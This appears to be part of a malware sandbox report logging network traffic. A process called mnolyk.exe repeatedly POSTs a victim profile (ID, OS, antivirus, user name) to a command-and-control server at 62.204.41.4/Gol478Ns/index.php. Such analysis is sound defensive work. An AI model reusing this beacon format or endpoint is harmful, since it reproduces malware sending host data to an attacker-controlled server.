                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:13.608417034 CET737INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        538192.168.2.55022862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:13.781549931 CET738OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:13.847825050 CET738INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        539192.168.2.55022962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:14.024749994 CET739OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:14.089824915 CET739INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        54192.168.2.54974462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:57.374562025 CET255OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:57.440777063 CET255INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        540192.168.2.55023062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:14.260159016 CET740OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:14.326316118 CET740INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        541192.168.2.55023162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:14.506548882 CET741OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:14.571222067 CET741INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        542192.168.2.55023262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:14.756016016 CET742OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:14.823223114 CET742INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        543192.168.2.55023362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:15.000211954 CET743OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:15.083638906 CET743INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        544192.168.2.55023462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:15.265930891 CET744OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:15.331311941 CET744INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        545192.168.2.55023562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:15.519092083 CET745OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:15.585570097 CET745INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        546192.168.2.55023662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:15.762067080 CET746OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:15.827687025 CET746INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        547192.168.2.55023762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:16.017119884 CET747OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:16.085264921 CET747INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        548192.168.2.55023862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:16.271311998 CET748OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:16.337477922 CET748INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        549192.168.2.55023962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:16.511065006 CET749OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:16.574798107 CET749INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        55192.168.2.54974562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:57.611372948 CET256OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:57.675415993 CET256INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        550192.168.2.55024062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:16.745452881 CET750OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:16.811587095 CET750INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        551192.168.2.55024162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:16.998707056 CET751OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:17.066359997 CET751INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        552192.168.2.55024262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:17.244961977 CET752OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:17.309746027 CET752INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        553192.168.2.55024362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:17.486099958 CET753OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:17.552581072 CET753INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        554192.168.2.55024462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:17.729582071 CET754OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:17.794356108 CET754INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        555192.168.2.55024562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:19:17.964917898 CET755OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
